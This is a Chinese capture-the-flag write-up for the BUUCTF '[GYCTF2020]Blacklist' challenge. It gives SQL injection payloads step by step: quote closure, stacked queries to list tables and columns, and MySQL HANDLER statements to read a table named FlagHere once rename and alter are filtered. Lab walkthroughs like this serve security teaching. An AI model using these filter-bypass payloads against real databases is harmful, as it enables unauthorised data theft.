buuctf-[GYCTF2020]Blacklist1（小宇特详解）

1.先看题目是一道sql注入的题目

先尝试进行闭合

payload：1’

这里可以试出来是'来进行闭合即可

2.然后尝试着进行联合查询

发现是进行了过滤。

3.这里尝试着进行堆叠注入

payload:1’;show tables;#

4.查表

payload：1’; show columns from FlagHere;#

这里屏蔽了许多东西

5.这里由于rename，和alter被过滤了，这里考虑利用HANDLER语句

这里先解释一下HANDLER语句的用法

这里的HANDLER语句和select查询语句都可以在mysql中查询想要的东西

他的基本语句是

通过HANDLER tbl_name OPEN打开一张表，无返回结果。

通过HANDLER tbl_name READ FIRST获取tbl_name的第一行，通过READ NEXT依次获取其它行。最后一行执行之后再执行NEXT会返回一个空的结果。
通过HANDLER tbl_name CLOSE来关闭打开的tbl_name。

payload：1’;handler FlagHere open;handler FlagHere read first;handler FlagHere close;#